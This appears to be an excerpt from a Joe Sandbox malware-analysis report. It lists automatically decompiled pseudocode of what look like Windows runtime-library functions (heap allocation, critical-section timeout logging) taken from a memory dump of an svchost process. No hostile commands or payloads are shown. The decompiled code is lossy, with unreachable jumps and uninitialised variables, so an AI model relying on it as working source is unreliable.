                        • API String ID:
                        • Opcode ID: 46ff5b00efaf159d05891f136219373e657df74ca892b2f2176c421a2b28933c
                        • Instruction ID: 097031987ee38147f57df36d34dad81a5eb80d3e7f7c32464443668a239bf2ba
                        • Opcode Fuzzy Hash: 46ff5b00efaf159d05891f136219373e657df74ca892b2f2176c421a2b28933c
                        • Instruction Fuzzy Hash: 0B014474A0120DAFCB04EFA8D545AEEB7F4EF48300F108459B905EB381DB34DA00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E030E1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t15;
                        				intOrPtr _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_t26 = __edx;
                        				_v8 =  *0x311d360 ^ _t29;
                        				_v12 = _a4;
                        				_v20 = __ecx;
                        				_v16 = __edx;
                        				_v46 = 0x1024;
                        				if(E03047D50() == 0) {
                        					_t15 = 0x7ffe0380;
                        				} else {
                        					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v52);
                        				_push(0xc);
                        				_push(0x20402);
                        				_push( *_t15 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4b9fa72dd2c63576b704d855fa17970a696d69635234ca1a0c8c0537253b568e
                        • Instruction ID: c27598c83fa49f96cccbd391757adc051e42b2f46f8d592793216c3ece3b74c9
                        • Opcode Fuzzy Hash: 4b9fa72dd2c63576b704d855fa17970a696d69635234ca1a0c8c0537253b568e
                        • Instruction Fuzzy Hash: EDF062B5A11358EFCB04EFA9D505AAEB7F4FF58300F044069B915EB381EA349A00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0304C577(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0304C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x30011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L10:
                        						E030F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags == 0) {
                        						goto L10;
                        					}
                        					goto L9;
                        				} else {
                        					return 1;
                        				}
                        			}










                        C-Code - Quality: 54%
                        			E0306927A(void* __ecx) {
                        				signed int _t11;
                        				void* _t14;
                        
                        				_t11 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                        				if(_t11 != 0) {
                        					E0306FA60(_t11, 0, 0x98);
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                        					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                        					E030692C6(_t11, _t14);
                        				}
                        				return _t11;
                        			}






                        C-Code - Quality: 94%
                        			E030E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                        				void* __esi;
                        				signed char _t3;
                        				signed char _t7;
                        				void* _t19;
                        
                        				_t17 = __ecx;
                        				_t3 = E030DFD22(__ecx);
                        				_t19 =  *0x311849c - _t3; // 0x0
                        				if(_t19 == 0) {
                        					__eflags = _t17 -  *0x3118748; // 0x0
                        					if(__eflags <= 0) {
                        						E030E1C06();
                        						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                        						__eflags = _t3;
                        						if(_t3 != 0) {
                        							L5:
                        							__eflags =  *0x3118724 & 0x00000004;
                        							if(( *0x3118724 & 0x00000004) == 0) {
                        								asm("int3");
                        								return _t3;
                        							}
                        						} else {
                        							_t3 =  *0x7ffe02d4 & 0x00000003;
                        							__eflags = _t3 - 3;
                        							if(_t3 == 3) {
                        								goto L5;
                        							}
                        						}
                        					}
                        					return _t3;
                        				} else {
                        					_t7 =  *0x3118724; // 0x1
                        					return E030D8DF1(__ebx, 0xc0000374, 0x3115890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                        				}
                        			}








                        C-Code - Quality: 43%
                        			E030F8D34(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				short _v42;
                        				char _v48;
                        				signed char* _t12;
                        				intOrPtr _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t25;
                        				signed int _t26;
                        
                        				_t23 = __edx;
                        				_v8 =  *0x311d360 ^ _t26;
                        				_v16 = __ecx;
                        				_v42 = 0x1c2b;
                        				_v12 = __edx;
                        				if(E03047D50() == 0) {
                        					_t12 = 0x7ffe0386;
                        				} else {
                        					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v48);
                        				_push(8);
                        				_push(0x20402);
                        				_push( *_t12 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                        			}














                        C-Code - Quality: 36%
                        			E030F8B58(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x311d360 ^ _t25;
                        				_v20 = __ecx;
                        				_v46 = 0x1c26;
                        				if(E03047D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v52);
                        				_push(4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}














                        C-Code - Quality: 100%
                        			E03024F2E(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0) {
                        					L6:
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L8:
                        						E030F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags != 0) {
                        						goto L9;
                        					}
                        					goto L8;
                        				}
                        				_t18 = __ecx + 0x30;
                        				if(E0304C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3001030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L6;
                        				} else {
                        					return 1;
                        				}
                        			}










                        C-Code - Quality: 88%
                        			E0304746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                        				signed int _t8;
                        				void* _t10;
                        				short* _t17;
                        				void* _t19;
                        				intOrPtr _t20;
                        				void* _t21;
                        
                        				_t20 = __esi;
                        				_t19 = __edi;
                        				_t17 = __ebx;
                        				if( *((char*)(_t21 - 0x25)) != 0) {
                        					if(__ecx == 0) {
                        						E0303EB70(__ecx, 0x31179a0);
                        					} else {
                        						asm("lock xadd [ecx], eax");
                        						if((_t8 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(__ecx + 4)));
                        							E030695D0();
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                        							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                        							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                        						}
                        					}
                        					L10:
                        				}
                        				_t10 = _t19 + _t19;
                        				if(_t20 >= _t10) {
                        					if(_t19 != 0) {
                        						 *_t17 = 0;
                        						return 0;
                        					}
                        				}
                        				return _t10;
                        				goto L10;
                        			}










                        C-Code - Quality: 36%
                        			E030F8CD6(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				short _v38;
                        				char _v44;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x311d360 ^ _t25;
                        				_v12 = __ecx;
                        				_v38 = 0x1c2d;
                        				if(E03047D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v44);
                        				_push(0xffffffe4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E0306B640(E03069AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}














                        C-Code - Quality: 100%
                        			E0305A44B(signed int __ecx) {
                        				intOrPtr _t13;
                        				signed int _t15;
                        				signed int* _t16;
                        				signed int* _t17;
                        
                        				_t13 =  *0x3117b9c; // 0x0
                        				_t15 = __ecx;
                        				_t16 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                        				if(_t16 == 0) {
                        					return 0;
                        				}
                        				 *_t16 = _t15;
                        				_t17 =  &(_t16[2]);
                        				E0306FA60(_t17, 0, _t15 << 2);
                        				return _t17;
                        			}








                        C-Code - Quality: 79%
                        			E0302F358(void* __ecx, signed int __edx) {
                        				char _v8;
                        				signed int _t9;
                        				void* _t20;
                        
                        				_push(__ecx);
                        				_t9 = 2;
                        				_t20 = 0;
                        				if(E0305F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                        					_t20 = L03044620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				}
                        				return _t20;
                        			}







                        C-Code - Quality: 100%
                        			E0303FF60(intOrPtr _a4) {
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t13;
                        				intOrPtr _t14;
                        				void* _t15;
                        				void* _t16;
                        				void* _t17;
                        
                        				_t14 = _a4;
                        				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x30011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					return E030F88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                        				} else {
                        					return E03040050(_t14);
                        				}
                        			}











                        C-Code - Quality: 100%
                        			E030DD380(void* __ecx, void* __edx, intOrPtr _a4) {
                        				void* _t5;
                        
                        				if(_a4 != 0) {
                        					_t5 = L0302E8B0(__ecx, _a4, 0xfff);
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        					return _t5;
                        				}
                        				return 0xc000000d;
                        			}




                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E030B41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				void* _t5;
                        				void* _t14;
                        
                        				_push(8);
                        				_push(0x31008f0);
                        				_t5 = E0307D08C(__ebx, __edi, __esi);
                        				if( *0x31187ec == 0) {
                        					E0303EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                        					if( *0x31187ec == 0) {
                        						 *0x31187f0 = 0x31187ec;
                        						 *0x31187ec = 0x31187ec;
                        						 *0x31187e8 = 0x31187e4;
                        						 *0x31187e4 = 0x31187e4;
                        					}
                        					 *(_t14 - 4) = 0xfffffffe;
                        					_t5 = L030B4248();
                        				}
                        				return E0307D0D1(_t5);
                        			}





                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0305A185() {
                        				void* __ecx;
                        				intOrPtr* _t5;
                        
                        				if( *0x31167e4 >= 0xa) {
                        					if(_t5 < 0x3116800 || _t5 >= 0x3116900) {
                        						return L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                        					} else {
                        						goto L1;
                        					}
                        				} else {
                        					L1:
                        					return E03040010(0x31167e0, _t5);
                        				}
                        			}





                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E030516E0(void* __edx, void* __eflags) {
                        				void* __ecx;
                        				void* _t3;
                        
                        				_t3 = E03051710(0x31167e0);
                        				if(_t3 == 0) {
                        					_t6 =  *[fs:0x30];
                        					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                        						goto L1;
                        					} else {
                        						return L03044620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                        					}
                        				} else {
                        					L1:
                        					return _t3;
                        				}
                        			}





                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E030A53CA(void* __ebx) {
                        				intOrPtr _t7;
                        				void* _t13;
                        				void* _t14;
                        				intOrPtr _t15;
                        				void* _t16;
                        
                        				_t13 = __ebx;
                        				if( *((char*)(_t16 - 0x65)) != 0) {
                        					E0303EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                        					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                        				}
                        				if(_t15 != 0) {
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                        					return  *((intOrPtr*)(_t16 - 0x64));
                        				}
                        				return _t7;
                        			}








                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0303AAB0() {
                        				intOrPtr* _t4;
                        
                        				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t4 != 0) {
                        					if( *_t4 == 0) {
                        						goto L1;
                        					} else {
                        						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                        					}
                        				} else {
                        					L1:
                        					return 0x7ffe0030;
                        				}
                        			}




                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E030535A1(void* __eax, void* __ebx, void* __ecx) {
                        				void* _t6;
                        				void* _t10;
                        				void* _t11;
                        
                        				_t10 = __ecx;
                        				_t6 = __eax;
                        				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                        					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                        				}
                        				if( *((char*)(_t11 - 0x1a)) != 0) {
                        					return E0303EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				}
                        				return _t6;
                        			}






                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0302DB40() {
                        				signed int* _t3;
                        				void* _t5;
                        
                        				_t3 = L03044620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                        				if(_t3 == 0) {
                        					return 0;
                        				} else {
                        					 *_t3 =  *_t3 | 0x00000400;
                        					return _t3;
                        				}
                        			}





                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E030AA537(intOrPtr _a4, intOrPtr _a8) {
                        
                        				return L03048E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                        			}



                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E03043A1C(intOrPtr _a4) {
                        				void* _t5;
                        
                        				return L03044620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}




                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E030536CC(void* __ecx) {
                        
                        				if(__ecx > 0x7fffffff) {
                        					return 0;
                        				} else {
                        					return L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        			}



                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E030376E2(void* __ecx) {
                        				void* _t5;
                        
                        				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                        					return L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        				return _t5;
                        			}




                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0302AD30(intOrPtr _a4) {
                        
                        				return L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}



                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E03047D50() {
                        				intOrPtr* _t3;
                        
                        				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t3 != 0) {
                        					return  *_t3;
                        				} else {
                        					return _t3;
                        				}
                        			}




                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E03052ACB() {
                        				void* _t5;
                        
                        				return E0303EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        			}




                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E030BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                        				void* _t7;
                        				intOrPtr _t9;
                        				intOrPtr _t10;
                        				intOrPtr* _t12;
                        				intOrPtr* _t13;
                        				intOrPtr _t14;
                        				intOrPtr* _t15;
                        
                        				_t13 = __edx;
                        				_push(_a4);
                        				_t14 =  *[fs:0x18];
                        				_t15 = _t12;
                        				_t7 = E0306CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                        				_push(_t13);
                        				E030B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                        				_t9 =  *_t15;
                        				if(_t9 == 0xffffffff) {
                        					_t10 = 0;
                        				} else {
                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                        				}
                        				_push(_t10);
                        				_push(_t15);
                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                        				return E030B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                        			}











                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030BFDFA
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030BFE2B
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030BFE01
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: eaed2c5dcfba6f0811355ea26703453c87a317aa6a98d5713f0431ced3bfe576
                        • Instruction ID: 2c8dbb98dff173bb36e67fe17ad79fce2d99a3e378047d466e3c814bb676ebc8
                        • Opcode Fuzzy Hash: eaed2c5dcfba6f0811355ea26703453c87a317aa6a98d5713f0431ced3bfe576
                        • Instruction Fuzzy Hash: AEF0C236241201BFE6219A45DC02FA7BB6AEB85730F140214F6285A1D1DA62B83086A4
                        Uniqueness

                        Uniqueness Score: -1.00%